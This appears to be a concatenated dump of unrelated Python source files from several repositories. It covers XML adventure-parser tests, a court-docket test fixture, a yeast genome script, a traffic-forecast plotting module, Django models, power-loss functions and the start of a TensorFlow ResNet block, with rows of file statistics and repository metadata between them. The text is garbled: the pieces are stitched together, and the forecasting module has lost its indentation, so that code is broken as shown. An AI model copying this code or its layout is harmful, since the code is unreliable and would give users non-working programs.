        location = get_locations(minidom.parseString(document), [])[0]

        self.assertEqual(2, len(get_exits(location, [])))

    def test_can_create_header_for_location(self):
        document = """<adventure>
            <instances>
                <instance NAME='loc1' PARENT='location'>
                    <exit DIRECTION='e' TARGET='loc1'></exit>
                </instance>
            </instances>
        </adventure>"""
        location = get_locations(minidom.parseString(document), [])[0]

        self.assertEqual('loc1 [label="loc1"];', dot_for_location_header(location, start_location))


if __name__ == '__main__':
    unittest.main()
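The inheritance tests above all hinge on walking `PARENT` attributes through class definitions until `location` is reached (case-insensitively). A hedged sketch of such a walk over minidom elements; this illustrates the idea only and is not the real `is_location` implementation, whose name and behaviour beyond these tests are unknown here:

```python
from xml.dom import minidom


def inherits_location(instance, classes):
    """Follow PARENT attributes through class definitions until 'location' or a dead end."""
    by_name = {c.getAttribute('NAME'): c for c in classes}
    parent = instance.getAttribute('PARENT')
    while parent:
        if parent.lower() == 'location':
            return True
        cls = by_name.get(parent)
        if cls is None:
            return False  # parent is neither 'location' nor a known class
        parent = cls.getAttribute('PARENT')
    return False


doc = minidom.parseString(
    "<adventure><classes>"
    "<class NAME='loc_cls' PARENT='LOCATION'/>"
    "</classes><instances>"
    "<instance NAME='loc1' PARENT='loc_cls'/>"
    "</instances></adventure>")
inst = doc.getElementsByTagName('instance')[0]
```

A real implementation would also need to guard against cyclic PARENT chains, which this sketch omits.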
# ---- tests/fixtures/dict_list/docket_list_with_duplicates.py (SimmonsRitchie/court_docket_scraper, MIT) ----
docket_list = [
    {
        "county": "Dauphin",
        "docketnum": 1,
        "caption": "Commonwealth V. Smith, John A.",
        "dob": "01/01/1986",
        "filing_date": "03/03/2019",
        "charges": "Receiving Stolen Property; Driving W/O A License",
        "bail": 25000,
        "url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
    },
    {
        "county": "Dauphin",
        "docketnum": 1,
        "caption": "Commonwealth V. Smith, John A.",
        "dob": "01/01/1986",
        "filing_date": "03/03/2019",
        "charges": "Receiving Stolen Property; Driving W/O A License",
        "bail": 25000,
        "url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
    },
    {
        "county": "Dauphin",
        "docketnum": 1,
        "caption": "Commonwealth V. Smith, John A.",
        "dob": "01/01/1986",
        "filing_date": "03/03/2019",
        "charges": "Receiving Stolen Property; Driving W/O A License",
        "bail": 25000,
        "url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
    },
    {
        "county": "Dauphin",
        "docketnum": 1234,
        "caption": "Commonwealth V. Smith, John A.",
        "dob": "01/01/1986",
        "filing_date": "03/03/2019",
        "charges": "Receiving Stolen Property; Driving W/O A License",
        "bail": 25000,
        "url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
    },
    {
        "county": "Dauphin",
        "docketnum": 12345,
        "caption": "Commonwealth V. Smith, John A.",
        "dob": "01/01/1986",
        "filing_date": "03/03/2019",
        "charges": "Receiving Stolen Property; Driving W/O A License",
        "bail": 25000,
        "url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
    },
    {
        "county": "Dauphin",
        "docketnum": 123456,
        "caption": "Commonwealth V. Smith, John A.",
        "dob": "01/01/1986",
        "filing_date": "03/03/2019",
        "charges": "Receiving Stolen Property; Driving W/O A License; "
                   "homicide",
        "bail": 25000,
        "url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
    },
]
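The fixture above deliberately repeats its first entry three times, which suggests it exercises duplicate filtering. A hedged sketch of how exact-duplicate dicts could be dropped while preserving first-seen order; the helper name is illustrative, and the project's real scraper may deduplicate differently:

```python
def dedupe(dicts):
    """Drop exact-duplicate dicts, keeping the first occurrence of each."""
    seen, unique = set(), []
    for d in dicts:
        key = tuple(sorted(d.items()))  # dicts are unhashable, so build a hashable key
        if key not in seen:
            seen.add(key)
            unique.append(d)
    return unique
```

The sorted-items key only works when all values are hashable, which holds for the flat string/int records in this fixture.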
# ---- scenarios/YeastShufflingEvents.py (865699871/IAGS_version1.0, AFL-1.1) ----
from util.calculateFissionsAndFusions import calculateFissionAndFussions
"""
Calculate fissions and fusions for yeast across its evolutionary history.

Results are written to outputdata/Yeast.
"""
path = 'D:/InferAncestorGenome/realData'
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
ancestor_copy_number = 1

# (descendant name, block-sequence file, descendant copy number).
# Post-WGD species carry two copies of each ancestral block, pre-WGD species one.
comparisons = [
    ('N. castellii', 'Ncastellii.final.block', 2),
    ('S. cerevisiae', 'Scerevisiae.final.block', 2),
    ('K. naganishii', 'Knaganishii.final.block', 2),
    ('Z. rouxii', 'Zrouxii.final.block', 1),
    ('L. kluyveri', 'Lkluyveri.final.block', 1),
    ('L. waltii', 'Lwaltii.final.block', 1),
    ('L. thermotolerans', 'Lthermotolerans.final.block', 1),
    ('E. gossypii', 'Egossypii.final.block', 1),
    ('K. lactis', 'Klactis.final.block', 1),
]

outfile = open(path + '/IAGS_version1.0/outputdata/Yeast/shufflingEvents.txt', 'w')
for name, block_file, descendant_copy_number in comparisons:
    descendant_file = species_block_sequence_dir + block_file
    fissions, fusions = calculateFissionAndFussions(descendant_file, ancestor_file,
                                                    descendant_copy_number, ancestor_copy_number,
                                                    ancestor_block_sequence_dir)
    outfile.write('preWGD yeast -> ' + name + '\n' +
                  'fissions: ' + str(fissions) + '\t' + 'fusions: ' + str(fusions) + '\n')
outfile.close()
# ---- visualisation.py (PatriceC/MLProjectISDP2020, MIT) ----
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 9 23:30:00 2020
@author: Patrice CHANOL & Corentin MORVAN--CHAUMEIL
"""
import pandas as pd
import numpy as np
import torch
import matplotlib.pyplot as plt
import data_preprocessing
def pred_vs_reality(model, input_window, output_window, date_range=['2018-07-09', '2018-08-10'], latitude=30.268652000000003, longitude=-97.759929, direction=0, epoch=None, pourcentage=None):
"""
Affiche les prédictions du modèle choisi pour la date, lieu et direction choisis.
Parameters
----------
model : Modèle choisi
input_window : int
Représente le nombre de jours de la séquence d'entrée qui servira d'input pour l'entraînement
output_window : int
Représente le nombre d'heures de la séquence de sortie qui servira de target
date_range : list, optional
DESCRIPTION. The default is ['2018-07-09', '2018-08-10']
latitude : float, optional
DESCRIPTION. The default is 30.268652000000003
longitude : float, optional
DESCRIPTION. The default is -97.759929
direction : int, optional
DESCRIPTION. The default is 0
epoch : int
Nombre d'epoch dans l'apprentissage du modèle
pourcentage : int
Pourcentage de l'epoch d'apprentissage
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
data = pd.read_csv('./Radar_Traffic_Counts.csv')
# Préparation du Dataset
data = data.drop(columns=['location_name', 'Time Bin'])
data['Direction'] = data['Direction'].astype('category').cat.codes
data['Date'] = pd.to_datetime(data[['Year', 'Month', 'Day']], errors='coerce')
data = data.sort_values(['Date'])
data_tot = data
# The preprocessing closely mirrors data_preprocessing.py, but it cannot be reused directly because of a few differences
# Keep only the data of interest, i.e. the selected date range, location and direction
data = data[(data['Date'] >= date_range[0]) & (data['Date'] <= date_range[1]) & (data['location_longitude'] == longitude) & (data['location_latitude'] == latitude) & (data['Direction'] == direction)]
col = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Hour', 'Direction']
col_no_hour = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Direction']
data = data.groupby(col)['Volume'].sum().reset_index()
data_tot = data_tot.groupby(col)['Volume'].sum().reset_index() # Keep the full data: we need access to the days preceding the ones we predict on
# Normalise the values with the min-max method
volume_max, volume_min = data['Volume'].max(), data['Volume'].min()
data = data.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
data_tot = data_tot.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
# Likewise, drop rows with missing values
data = data.dropna()
data_tot = data_tot.dropna()
# Lists that will hold the dates and hours (x), actual volumes (t) and predicted volumes (p)
x, t, p = [], [], []
# Every output_window hours, run a seq-to-seq prediction over the next output_window hours and store it for visual comparison with the actual values
current_date = pd.to_datetime(date_range[0])
while current_date < pd.to_datetime(date_range[1]):
date_row = current_date.replace(hour=0)
# Record the current hour
hour_current = current_date.hour
# Find which row we are on
row = data[(data['Date'] == date_row)]
day_of_week = row['Day of Week']
# Build the data series for the chosen day and output_window
result = data_preprocessing.series(date=date_row, latitude=latitude, longitude=longitude, direction=direction, input_window=input_window, output_window=output_window, data=data_tot)
if result is not None:
target, serie = result
# Take the value series starting at the hour of interest (hour_current), then normalise before feeding the model
target_norm, serie_norm = torch.tensor((target[hour_current] - volume_min)/(volume_max - volume_min)), torch.tensor((serie[hour_current] - volume_min)/(volume_max - volume_min)).unsqueeze(0)
# Turn the day of the week into a matrix of one-hot vectors (every row is identical)
day_of_week_one_hot = torch.tensor(np.eye(7)[day_of_week])
# Run inference to get the predictions
pred_norm = model.forward(day_of_week_one_hot.to(device), serie_norm.float().to(device)).detach().squeeze(0)
# De-normalise
target_current = (target_norm * (volume_max - volume_min) + volume_min).tolist()
pred_current = (pred_norm * (volume_max - volume_min) + volume_min).tolist()
x += [current_date + pd.to_timedelta(h, unit='h') for h in range(output_window)]
t += target_current
p += pred_current
# Advance the date by output_window hours
current_date += pd.to_timedelta(output_window, unit='h')
# Plot the predictions against reality and save the figure
res = pd.DataFrame()
res['x'] = x
res['t'] = t
res['p'] = p
res.index = res['x']
plt.figure(0)
res['t'].plot(color="green", label='Actual data')
res['p'].plot(color="red", label='Prediction')
plt.axis([x[0], x[-1], 0, max(max(t), max(p))])
plt.legend(loc='upper right')
if epoch is None:
plt.title(model.name_model + ': Data vs Pred')
plt.show()
else:
plt.title(model.name_model + ': Data vs Pred, Epoch: ' + str(epoch))
# Save before show(): with some backends, show() leaves an empty figure behind
plt.savefig('./visu/pred_vs_data_' + model.name_model + '_epoch_' + str(epoch) + '_pourcentage_' + str(pourcentage) + '%_' + str(input_window) + '_days_to_' + str(output_window) + '_hours.png', dpi=300)
plt.show()
plt.close()
def forecast(model, input_window, output_window, date_range=['2018-07-09', '2018-08-10'], latitude=30.268652000000003, longitude=-97.759929, direction=0, epoch=None):
"""
A partir de la date date_range[0], réalise un forecast avec le modèle choisi jusqu'à la date date_range[1].
Pour cela, on ne prend que les données nécessaires pour la première prédiction (prédiction des premières 24h par exemple)
puis utilise les prédictions pour réaliser les prédictions postérieures (pendant plusieurs semaines par exemple)
Les prédictions sont donc biaisées au fur et à mesure; et l'on va tenter de représenter visuellement ici à quel
point le forecast long-terme est proche de la réalité ou non.
Parameters
----------
model : Modèle choisi
input_window : int
Représente le nombre de jours de la séquence d'entrée qui servira d'input pour l'entraînement
output_window : int
Représente le nombre d'heures de la séquence de sortie qui servira de target
date_range : list, optional
DESCRIPTION. The default is ['2018-07-09', '2018-08-10']
latitude : float, optional
DESCRIPTION. The default is 30.268652000000003
longitude : float, optional
DESCRIPTION. The default is -97.759929
direction : int, optional
DESCRIPTION. The default is 0
epoch : int
Nombre d'epoch dans l'apprentissage du modèle
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
data = pd.read_csv('./Radar_Traffic_Counts.csv')
# Prepare the dataset
data = data.drop(columns=['location_name', 'Time Bin'])
data['Direction'] = data['Direction'].astype('category').cat.codes
data['Date'] = pd.to_datetime(data[['Year', 'Month', 'Day']], errors='coerce')
data = data.sort_values(['Date'])
data_tot = data
# The preprocessing closely mirrors data_preprocessing.py, but it cannot be reused directly because of a few differences
# Keep only the data of interest, i.e. the selected date range, location and direction
data = data[(data['Date'] >= date_range[0]) & (data['Date'] <= date_range[1]) & (data['location_longitude'] == longitude) & (data['location_latitude'] == latitude) & (data['Direction'] == direction)]
col = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Hour', 'Direction']
col_no_hour = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Direction']
data = data.groupby(col)['Volume'].sum().reset_index()
data_tot = data_tot.groupby(col)['Volume'].sum().reset_index() # Keep the full data: we need access to the days preceding the ones we predict on
# Normalise the values with the min-max method
volume_max, volume_min = data['Volume'].max(), data['Volume'].min()
data = data.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
data_tot = data_tot.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
# Likewise, drop rows with missing values
data = data.dropna()
data_tot = data_tot.dropna()
# Lists that will hold the dates and hours (x), actual volumes (t) and predicted volumes (p)
x, t, p = [], [], []
current_date = pd.to_datetime(date_range[0])
inputs_for_prediction, output_of_prediction = None, None
while current_date < pd.to_datetime(date_range[1]):
date_row = current_date.replace(hour=0)
# Record the current hour
hour_current = current_date.hour
# Find which row we are on
row = data[(data['Date'] == date_row)]
day_of_week = row['Day of Week']
# Build the data series for the chosen day and output_window
result = data_preprocessing.series(date=date_row, latitude=latitude, longitude=longitude, direction=direction, input_window=input_window, output_window=output_window, data=data_tot)
if result is not None:
# The data in "serie" is only used on the first pass; afterwards the inputs are shifted to include the values predicted in the previous iterations
target, serie = result
# On the first pass
if inputs_for_prediction is None:
target, serie = target[hour_current], serie[hour_current]
inputs_for_prediction = serie
# Afterwards, shift the input series to gradually append the predictions made in previous iterations
else:
target = target[hour_current]
inputs_for_prediction = np.array(list(inputs_for_prediction[output_window:]) + output_of_prediction)
# Take the value series starting at the hour of interest (hour_current), then normalise before feeding the model
target_norm, input_norm = torch.tensor((target - volume_min)/(volume_max - volume_min)), torch.tensor((inputs_for_prediction - volume_min)/(volume_max - volume_min)).unsqueeze(0)
# Turn the day of the week into a matrix of one-hot vectors (every row is identical)
day_of_week_one_hot = torch.tensor(np.eye(7)[day_of_week])
# Run inference to get the predictions
pred_norm = model.forward(day_of_week_one_hot.to(device), input_norm.float().to(device)).detach().squeeze(0)
# De-normalise
target_current = (target_norm * (volume_max - volume_min) + volume_min).tolist()
pred_current = (pred_norm * (volume_max - volume_min) + volume_min).tolist()
# Predictions that will be needed as input for the next forecast step
output_of_prediction = pred_current
x += [current_date + pd.to_timedelta(h, unit='h') for h in range(output_window)]
t += target_current
p += pred_current
# Advance the date by output_window hours
current_date += pd.to_timedelta(output_window, unit='h')
# Plot the predictions against reality and save the figure
res = pd.DataFrame()
res['x'] = x
res['t'] = t
res['p'] = p
res.index = res['x']
plt.figure(1)
res['t'].plot(color="green", label='Actual data')
res['p'].plot(color="red", label='Prediction')
plt.axis([x[0], x[-1], 0, max(max(t), max(p))])
plt.legend(loc='upper right')
if epoch is None:
plt.title(model.name_model + ': Forecast')
plt.show()
else:
plt.title(model.name_model + ': Forecast, Epoch: ' + str(epoch))
# Save before show(): with some backends, show() leaves an empty figure behind
plt.savefig('./visu/forecast_' + model.name_model + '_epoch_' + str(epoch) + '_' + str(input_window) + '_days_to_' + str(output_window) + '_hours.png', dpi=300)
plt.show()
plt.close()
| 52.258824 | 217 | 0.675371 | 1,893 | 13,326 | 4.611727 | 0.18859 | 0.028866 | 0.014433 | 0.020619 | 0.809622 | 0.802749 | 0.794731 | 0.794731 | 0.758305 | 0.758305 | 0 | 0.020311 | 0.209365 | 13,326 | 254 | 218 | 52.464567 | 0.808276 | 0.380084 | 0 | 0.788618 | 0 | 0 | 0.129205 | 0.006479 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01626 | false | 0 | 0.04065 | 0 | 0.056911 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
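Both `pred_vs_reality` and `forecast` above normalise the volumes with the min-max method before inference and de-normalise the model output before plotting. A minimal sketch of that round trip, with made-up volume values (not taken from the radar dataset):

```python
import numpy as np

# Hypothetical hourly traffic volumes, for illustration only.
volume = np.array([120.0, 450.0, 300.0, 80.0, 510.0])

volume_max, volume_min = volume.max(), volume.min()

# Min-max normalisation, as applied before model.forward(...).
norm = (volume - volume_min) / (volume_max - volume_min)

# De-normalisation, as applied to the predictions before plotting.
restored = norm * (volume_max - volume_min) + volume_min

print(norm.min(), norm.max())         # 0.0 1.0
print(np.allclose(restored, volume))  # True
```

The same `volume_max`/`volume_min` pair must be reused on both sides of the model, which is why both functions recompute them once from the filtered data and keep them around for de-normalisation.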
669994f84d8b01d577238e804af1931357a7839c | 91 | py | Python | simplebitly/__init__.py | amirRamirfatahi/simplebitly | edd2fc869d1b5696fd76f6255a341145019c52ad | [
"MIT"
] | null | null | null | simplebitly/__init__.py | amirRamirfatahi/simplebitly | edd2fc869d1b5696fd76f6255a341145019c52ad | [
"MIT"
] | 2 | 2020-01-13T13:09:06.000Z | 2020-01-13T13:10:40.000Z | simplebitly/__init__.py | amirRamirfatahi/simple_bitly | edd2fc869d1b5696fd76f6255a341145019c52ad | [
"MIT"
] | null | null | null | from .shortener import app as generator_app
from .redirector import app as redirector_app
| 22.75 | 45 | 0.835165 | 14 | 91 | 5.285714 | 0.5 | 0.243243 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 91 | 3 | 46 | 30.333333 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
66b438e06b1ece696d8af65917cab018dc2e5281 | 541 | py | Python | predict/models.py | lightd22/swainBot-web | 80c3a3052d8227f15b6345ef198e06528fc3fa14 | [
"Apache-2.0"
] | 1 | 2017-10-20T05:06:26.000Z | 2017-10-20T05:06:26.000Z | predict/models.py | lightd22/swainBot-web | 80c3a3052d8227f15b6345ef198e06528fc3fa14 | [
"Apache-2.0"
] | 5 | 2017-10-20T05:44:18.000Z | 2020-09-25T21:13:36.000Z | predict/models.py | lightd22/swainBot-web | 80c3a3052d8227f15b6345ef198e06528fc3fa14 | [
"Apache-2.0"
] | 1 | 2018-01-14T15:56:16.000Z | 2018-01-14T15:56:16.000Z | from django.db import models
# Create your models here.
class Champion(models.Model):
champ_id = models.IntegerField(name='id', primary_key=True)
display_name = models.TextField(name='display_name', max_length=200)
image = None
def __str__(self):
return self.display_name
class Position(models.Model):
position_id = models.IntegerField(name='id', primary_key=True)
display_name = models.TextField(name='display_name', max_length=200)
image = None
def __str__(self):
return self.display_name
| 31.823529 | 72 | 0.722736 | 73 | 541 | 5.082192 | 0.410959 | 0.177898 | 0.107817 | 0.12938 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0 | 0.013393 | 0.171904 | 541 | 16 | 73 | 33.8125 | 0.814732 | 0.044362 | 0 | 0.615385 | 0 | 0 | 0.054369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.153846 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
66c8498c80aa0679d0feea5e2cdd4d18efffa6b3 | 1,196 | py | Python | mypower/losses_kron.py | yasirroni/mypower | 123c2d3380bf5f753a479c35e7b5cbafc82a8ebc | [
"Apache-2.0"
] | 2 | 2020-08-08T15:13:49.000Z | 2021-01-04T07:21:29.000Z | mypower/losses_kron.py | yasirroni/mypower | 123c2d3380bf5f753a479c35e7b5cbafc82a8ebc | [
"Apache-2.0"
] | null | null | null | mypower/losses_kron.py | yasirroni/mypower | 123c2d3380bf5f753a479c35e7b5cbafc82a8ebc | [
"Apache-2.0"
] | 1 | 2020-08-08T15:14:17.000Z | 2020-08-08T15:14:17.000Z | import numpy as np
def losses_kron(B0_kron,B1_kron,B2_kron,gen_PG_point,baseMVA):
"""Compute losses based on Kron's Method."""
gen_PG_point_pu = np.array(gen_PG_point) / baseMVA #convert to p.u.
B0_kron = np.array(B0_kron)
B1_kron = np.array(B1_kron)
B2_kron = np.array(B2_kron)
# losses0 = B0_kron * baseMVA
# losses1 = B1_kron.dot(gen_PG_point_pu) * baseMVA
# losses2 = gen_PG_point_pu.T.dot(B2_kron).dot(gen_PG_point_pu) * baseMVA
# losses = losses2 + losses1 + losses0 #total power losses
return (B0_kron + B1_kron.dot(gen_PG_point_pu) + gen_PG_point_pu.T.dot(B2_kron).dot(gen_PG_point_pu)) * baseMVA
def losses_kron_detailed(B0_kron,B1_kron,B2_kron,gen_PG_point,baseMVA):
"""Compute losses based on Kron's Method."""
gen_PG_point_pu = np.array(gen_PG_point) / baseMVA #convert to p.u.
B0_kron = np.array(B0_kron)
B1_kron = np.array(B1_kron)
B2_kron = np.array(B2_kron)
losses0 = B0_kron * baseMVA
losses1 = B1_kron.dot(gen_PG_point_pu) * baseMVA
losses2 = gen_PG_point_pu.T.dot(B2_kron).dot(gen_PG_point_pu) * baseMVA
# losses = losses2 + losses1 + losses0 #total power losses
return losses0, losses1, losses2 | 47.84 | 115 | 0.720736 | 207 | 1,196 | 3.821256 | 0.164251 | 0.094817 | 0.189633 | 0.166877 | 0.903919 | 0.903919 | 0.903919 | 0.87737 | 0.87737 | 0.87737 | 0 | 0.042254 | 0.168896 | 1,196 | 25 | 116 | 47.84 | 0.753521 | 0.308528 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
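The two functions above should agree term by term: the total is `B0 + B1·P + Pᵀ·B2·P` scaled back to MVA. A toy check with made-up B-coefficients for a two-generator system (not from any real network):

```python
import numpy as np

# Made-up Kron B-coefficients for a 2-generator toy system (per-unit).
B0 = 0.0003
B1 = np.array([0.0001, 0.0002])
B2 = np.array([[0.0005, 0.0001],
               [0.0001, 0.0008]])
baseMVA = 100.0

P = np.array([80.0, 120.0]) / baseMVA  # generator set-points in p.u.

# Detailed terms, as in losses_kron_detailed():
losses0 = B0 * baseMVA
losses1 = B1.dot(P) * baseMVA
losses2 = P.T.dot(B2).dot(P) * baseMVA  # total ≈ 0.2284 MW for this toy case

# One-shot total, as in losses_kron():
total = (B0 + B1.dot(P) + P.T.dot(B2).dot(P)) * baseMVA

print(np.isclose(total, losses0 + losses1 + losses2))  # True
```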
66c9a0b894b0f732591ff9784bdb651d5c8df75c | 67 | py | Python | src/AstarTrellis/__init__.py | SebastianMacaluso/AstarTrellis | 29808f18627cb48980de96dd1f1a3455bdd47cd4 | [
"MIT"
] | 1 | 2021-11-27T09:42:07.000Z | 2021-11-27T09:42:07.000Z | src/AstarTrellis/__init__.py | SebastianMacaluso/AstarTrellis | 29808f18627cb48980de96dd1f1a3455bdd47cd4 | [
"MIT"
] | null | null | null | src/AstarTrellis/__init__.py | SebastianMacaluso/AstarTrellis | 29808f18627cb48980de96dd1f1a3455bdd47cd4 | [
"MIT"
] | null | null | null | from . import iter_trellis_exact
from . import iter_trellis_approx
| 22.333333 | 33 | 0.850746 | 10 | 67 | 5.3 | 0.6 | 0.377358 | 0.528302 | 0.792453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119403 | 67 | 2 | 34 | 33.5 | 0.898305 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
dd8fc30ce9da5425c0275aac6da40839375ebd85 | 515 | py | Python | drivers/plot_stsnr_vs_gyroage.py | lgbouma/gilly | b3bc7cf53c28eee6420cd85c3975062d4f46c611 | [
"MIT"
] | null | null | null | drivers/plot_stsnr_vs_gyroage.py | lgbouma/gilly | b3bc7cf53c28eee6420cd85c3975062d4f46c611 | [
"MIT"
] | null | null | null | drivers/plot_stsnr_vs_gyroage.py | lgbouma/gilly | b3bc7cf53c28eee6420cd85c3975062d4f46c611 | [
"MIT"
] | null | null | null | from gilly.plotting import plot_stsnr_vs_gyroage
plot_stsnr_vs_gyroage(Prot_source='VSINI', gyro_source='A19', cdpp_id='rms3')
plot_stsnr_vs_gyroage(Prot_source='VSINI', gyro_source='A19', cdpp_id='rms6')
plot_stsnr_vs_gyroage(Prot_source='VSINI', gyro_source='A19', cdpp_id='rms12')
plot_stsnr_vs_gyroage(Prot_source='M15', gyro_source='A19', cdpp_id='rms3')
plot_stsnr_vs_gyroage(Prot_source='M15', gyro_source='A19', cdpp_id='rms6')
plot_stsnr_vs_gyroage(Prot_source='M15', gyro_source='A19', cdpp_id='rms12')
| 51.5 | 78 | 0.8 | 86 | 515 | 4.337209 | 0.22093 | 0.168901 | 0.206434 | 0.337802 | 0.89008 | 0.89008 | 0.863271 | 0.863271 | 0.863271 | 0.863271 | 0 | 0.052953 | 0.046602 | 515 | 9 | 79 | 57.222222 | 0.706721 | 0 | 0 | 0 | 0 | 0 | 0.132039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
06bc9ea141f0f8bdd807e2a7cb90bc18b25ec2a3 | 17,845 | py | Python | tensorflow/models/backbone/resnet.py | paulwong16/CloserLook3D | 71a7f519e55354c96c579adc7322a26fe7779ce7 | [
"MIT"
] | 215 | 2020-07-03T01:39:57.000Z | 2022-03-21T09:05:55.000Z | tensorflow/models/backbone/resnet.py | eglrp/CloserLook3D | f640be8e7ec9fb99a563034616b7ef413f5bf58e | [
"MIT"
] | 35 | 2020-07-15T04:12:26.000Z | 2022-01-15T13:38:36.000Z | tensorflow/models/backbone/resnet.py | eglrp/CloserLook3D | f640be8e7ec9fb99a563034616b7ef413f5bf58e | [
"MIT"
] | 39 | 2020-07-05T13:53:00.000Z | 2022-03-14T01:53:50.000Z | import tensorflow as tf
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
ROOT_DIR = os.path.join(BASE_DIR, '..')
sys.path.append(ROOT_DIR)
from ..local_aggregation_operators import *
def simple_block(layer_ind,
config,
inputs,
features,
scope,
radius,
out_fdim,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""This Block performing a simple Local Aggregation Operation
Args:
layer_ind: which layer to perform local aggregation
config: config file
inputs: a dict contains all inputs
features: float32[n0_points, in_fdim] - input features
scope: tensorflow scope name
radius: ball query radius
out_fdim: output feature dim
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
float32[n_points, out_fdim]
"""
with tf.variable_scope(scope) as sc:
x = LocalAggregation(config,
query_points=inputs['points'][layer_ind],
support_points=inputs['points'][layer_ind],
neighbors_indices=inputs['neighbors'][layer_ind],
features=features,
scope='local_aggreagtion',
radius=radius,
out_fdim=out_fdim,
is_training=is_training,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
return x
def bottleneck(layer_ind,
config,
inputs,
features,
scope,
radius,
out_fdim,
bottleneck_ratio,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""This Block performing a resnet bottleneck convolution (1conv > Local Aggregation > 1conv + shortcut)
Args:
layer_ind: which layer to perform local aggregation
config: config file
inputs: a dict contains all inputs
features: float32[n_points, in_fdim] - input features
scope: tensorflow scope name
